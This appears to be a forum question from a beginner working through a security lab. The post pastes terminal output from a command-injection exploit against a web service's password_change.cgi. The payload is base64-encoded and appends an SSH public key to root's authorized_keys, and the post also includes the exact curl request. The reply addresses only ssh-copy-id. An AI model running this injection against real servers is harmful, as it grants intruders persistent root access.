SSH: Permission denied (publickey,password)


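Cyber security newbie here, please bear with me. This is just a learning scenario; to move forward I did the best I could. It asked me to prepare and encode a payload, etc. I did these 4 steps.
Why, after generating the public/private rsa key pair and entering the password, can I still not ssh into the server? - [email protected]: Permission denied (publickey,password). I entered the generated key it asked for, but no luck, and foobar1 doesn't work either, nor does the combination (public key and password). I have already tried: ssh-copy-id -i ~/.ssh/id_rsa [email protected] (doesn't work, keeps asking for a password). The last part at the bottom confuses me! How should I write it? Can someone provide clarity/guidance to solve it? I have provided the whole step-by-step process from the terminal, as follows: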

root@kali:~# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /root/.ssh/id_rsa
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:Hp6lH+aI8JAlpRWQ1b8DGzxWOwbu6YGq6znjzP6sDKs root@kali
The key's randomart image is:
+---[RSA 3072]----+
|    .+o.         |
|    .  .o .      |
|      oo + .     |
|     +  B =      |
|    o .+SB.o     |
|     +.o==o      |
|.   +. .=.o.     |
| *oo.+ ..= .     |
|E+%Bo o . o      |
+----[SHA256]-----+
root@kali:~# echo -n '$COMMAND' | base64 -w 0      
JENPTU1BTkQ=root@kali:~# PAYLOAD="echo%20$(echo "JENPTU1BTkQ=" | base64 -d)|sh"
root@kali:~# PAYLOAD=$(echo $PAYLOAD | sed 's/%/%25/g; s/ /%20/g; s/|/%7C/g')  
root@kali:~# PAYLOAD="echo%20JENPTU1BTkQ=%3D%7Cbase64%20-d%7Csh"
root@kali:~#  curl -ks "http://192.168.6.2:10000/password_change.cgi" -d user=root&pam=&expired=2;
PAYLOAD="echo%20JENPTU1BTkQ=%3D%7Cbase64%20-d%7Csh"&old=foobar&new1=foobar1&new2=foobar1 
[1] 1922
[2] 1923
[3] 1924
[4] 1925
[5] 1926

[1]   Done                    curl -ks "http://192.168.6.2:10000/password_change.cgi" -d user=root
[2]   Done                    pam=
[3]   Done                    PAYLOAD="echo%20Q09NTUFORA==%3D%7Cbase64%20-d%7Csh"
[4]-  Done                    old=foobar
[5]+  Done                    new1=foobar1
root@kali:~# ssh [email protected]
[email protected]'s password: Hp6lH+aI8JAlpRWQ1b8DGzxWOwbu6YGq6znjzP6sDKs
Permission denied, please try again.
[email protected]: Permission denied (publickey,password).

(attempted to copy key to target server)
root@kali:~# ssh-copy-id [email protected]
/usr/bin/ssh-copy-id: INFO: Source of key(s) to be installed: "/root/.ssh/id_rsa.pub"
/usr/bin/ssh-copy-id: INFO: attempting to log in with the new key(s), to filter out any that are already installed
/usr/bin/ssh-copy-id: INFO: 1 key(s) remain to be installed -- if you are prompted now it is to install the new keys
[email protected]'s password: foobar1 
Permission denied, please try again.

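Run the following commands to exploit the web service and add the SSH key:

Prepare the command that will be executed on the target server to add the SSH key (done):
COMMAND="echo '$(cat ~/.ssh/id_rsa.pub)' >> /root/.ssh/authorized_keys"

Prepare and encode the payload (done):
PAYLOAD="echo%20$(echo "$COMMAND" | base64 -w 0)|base64%20-d|sh"

Exploit the RCE vulnerability and execute the payload (very confusing, parts of it look unnecessary) - the shell tries to run several things in the background (most of them just set a variable to a specific value in a subshell and then exit, and the variable and its value are lost):
curl -ks "http://192.168.6.2:10000/password_change.cgi" -d "user=root&pam=&expired=2;$PAYLOAD&old=foobar&new1=foobar1&new2=foobar1" -H "Referer: http://192.168.6.2:10000"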

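Answer 1

ssh-copy-id uses SSH to copy the public key into the ~/.ssh/authorized_keys file of the target user account on the target system.

To do this, you need to give it a way to log in via ssh to the target user account on the target system.

This means you will need to enter the password once to allow it to connect; after that you will be able to log in using just the SSH key.

I have snipped out the rest of the gibberish, because it looks like you are trying to use some unspecified http exploit to try to gain root access to the system, which is far beyond the scope of your actual question.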
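
The install step that ssh-copy-id carries out on the target once it has authenticated, sketched as an added example (not part of the original answer or of ssh-copy-id's own source). The function names install_pubkey, mode_of and count_keys, the scratch directory and the sample key are assumptions made for illustration; the modes set are ones sshd's StrictModes check accepts.

```shell
#!/bin/sh
# install_pubkey HOME_DIR PUBKEY_LINE
#   Appends PUBKEY_LINE to HOME_DIR/.ssh/authorized_keys unless it is already
#   there, and tightens the directory and file modes (700 / 600).
install_pubkey() {
    home_dir=$1
    pubkey=$2
    ssh_dir="$home_dir/.ssh"
    auth_file="$ssh_dir/authorized_keys"

    # A public key line is "<type> <base64> [comment]"; a fingerprint such as
    # "SHA256:..." or a passphrase is not a key and is rejected here.
    case "$pubkey" in
        ssh-rsa\ *|ssh-ed25519\ *|ecdsa-sha2-*\ *) ;;
        *) echo "not a public key line" >&2; return 2 ;;
    esac

    mkdir -p "$ssh_dir" && chmod 700 "$ssh_dir" || return 1
    touch "$auth_file" && chmod 600 "$auth_file" || return 1

    # -F fixed string, -x whole line, -q quiet: skip keys already installed.
    if grep -qxF -- "$pubkey" "$auth_file"; then
        return 0
    fi
    printf '%s\n' "$pubkey" >> "$auth_file"
}

# mode_of PATH -> first 10 characters of "ls -ld", e.g. "drwx------"
mode_of() {
    ls -ld "$1" | cut -c1-10
}

# count_keys HOME_DIR -> number of non-empty lines in authorized_keys
count_keys() {
    grep -c . "$1/.ssh/authorized_keys"
}

# Constructed sample key (not a real key) and a scratch directory standing in
# for the target account's home directory.
DEMO_HOME=$(mktemp -d)
DEMO_KEY='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABCONSTRUCTEDSAMPLE root@kali'
install_pubkey "$DEMO_HOME" "$DEMO_KEY"
install_pubkey "$DEMO_HOME" "$DEMO_KEY"   # second run must not duplicate the line
echo "keys installed: $(count_keys "$DEMO_HOME")"
echo "modes: $(mode_of "$DEMO_HOME/.ssh") $(mode_of "$DEMO_HOME/.ssh/authorized_keys")"
```

The key fingerprint printed by ssh-keygen is only a hash of the public key, so it is accepted neither as a key line here nor as the account password at the ssh prompt.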
